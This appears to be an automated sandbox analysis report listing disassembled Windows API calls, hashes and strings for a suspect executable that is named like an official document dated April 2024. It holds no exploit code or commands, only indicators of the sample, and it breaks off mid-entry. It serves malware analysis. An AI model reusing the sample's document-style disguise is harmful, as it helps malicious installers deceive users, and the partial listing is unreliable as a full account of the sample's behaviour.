                                                            • GetSysColor.USER32(00000000), ref: 004041B4
                                                            • SetTextColor.GDI32(?,00000000), ref: 004041C0
                                                            • SetBkMode.GDI32(?,?), ref: 004041CC
                                                            • GetSysColor.USER32(?), ref: 004041DF
                                                            • SetBkColor.GDI32(?,?), ref: 004041EF
                                                            • DeleteObject.GDI32(?), ref: 00404209
                                                            • CreateBrushIndirect.GDI32(?), ref: 00404213
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                            • Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
                                                            • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                            • Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                              • Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D1C
                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                            • String ID: 9
                                                            • API String ID: 163830602-2366072709
                                                            • Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                            • Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
                                                            • Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                            • Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
                                                            • GetMessagePos.USER32 ref: 00404A9C
                                                            • ScreenToClient.USER32(?,?), ref: 00404AB6
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                            • Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
                                                            • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                            • Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                            • MulDiv.KERNEL32(0001C000,00000064,000F6DC0), ref: 00402D4D
                                                            • wsprintfW.USER32 ref: 00402D5D
                                                            • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                            Strings
                                                            • verifying installer: %d%%, xrefs: 00402D57
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: verifying installer: %d%%
                                                            • API String ID: 1451636040-82062127
                                                            • Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                            • Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
                                                            • Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                            • Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                            • GlobalFree.KERNEL32(?), ref: 004028E9
                                                            • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                            • CloseHandle.KERNEL32(?), ref: 00402914
                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                            • String ID:
                                                            • API String ID: 2667972263-0
                                                            • Opcode ID: 488763c69193d29903f1ec99ce0b7eb5aa23b050358735c01cf8c5ab311974cd
                                                            • Instruction ID: 1aef917cd227803a683e0008524bb9a83fcfbb8b8ade77014dfab24c7f5e3f69
                                                            • Opcode Fuzzy Hash: 488763c69193d29903f1ec99ce0b7eb5aa23b050358735c01cf8c5ab311974cd
                                                            • Instruction Fuzzy Hash: F121C172800128BBCF216FA5CE49D9E7E79EF09324F20023AF510762E1C7795D418FA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,?,%trrelofternes%\Kompletteringernes.mov,000000FF,Software\dekanesserne\stragglingly,00000400,?,?,00000021), ref: 00402583
                                                            • lstrlenA.KERNEL32(Software\dekanesserne\stragglingly,?,?,%trrelofternes%\Kompletteringernes.mov,000000FF,Software\dekanesserne\stragglingly,00000400,?,?,00000021), ref: 0040258E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidelstrlen
                                                            • String ID: %trrelofternes%\Kompletteringernes.mov$Software\dekanesserne\stragglingly
                                                            • API String ID: 3109718747-3947681864
                                                            • Opcode ID: 5ef5de5a51cad2dc7d60a7dc31fb8caca6290446a2f4682328f723742ec07bad
                                                            • Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
                                                            • Opcode Fuzzy Hash: 5ef5de5a51cad2dc7d60a7dc31fb8caca6290446a2f4682328f723742ec07bad
                                                            • Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,?), ref: 00401D00
                                                            • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                            • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: 654fe9a3b94fa22656c9e0fad6745143c48d35558dbd85a331d0b39ad963d5af
                                                            • Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
                                                            • Opcode Fuzzy Hash: 654fe9a3b94fa22656c9e0fad6745143c48d35558dbd85a331d0b39ad963d5af
                                                            • Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401D59
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                            • String ID:
                                                            • API String ID: 3808545654-0
                                                            • Opcode ID: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                            • Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
                                                            • Opcode Fuzzy Hash: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                            • Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                            • wsprintfW.USER32 ref: 00404A15
                                                            • SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s
                                                            • API String ID: 3540041739-3551169577
                                                            • Opcode ID: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                            • Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
                                                            • Opcode Fuzzy Hash: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                            • Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetWindowTextW.USER32(00000000,petrels), ref: 00403C07
                                                            Strings
                                                            • 1033, xrefs: 00403B73, 00403B7D, 00403BEE
                                                            • "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe", xrefs: 00403B70
                                                            • petrels, xrefs: 00403BF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: TextWindow
                                                            • String ID: "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe"$1033$petrels
                                                            • API String ID: 530164218-4245169976
                                                            • Opcode ID: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                            • Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
                                                            • Opcode Fuzzy Hash: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                            • Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CharNextW.USER32(?,?,C:\,?,00405B23,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                            • CharNextW.USER32(00000000), ref: 00405AC2
                                                            • CharNextW.USER32(00000000), ref: 00405ADA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CharNext
                                                            • String ID: C:\
                                                            • API String ID: 3213498283-3404278061
                                                            • Opcode ID: d4fc8010274739b422e9c4851511b62dbacfb07d9cf0bff86c6d3941990f78f8
                                                            • Instruction ID: ae7ea18ea72f313bfc04c9b3c852ffada688ca8ba4779ecbeefbfcaf8eafd814
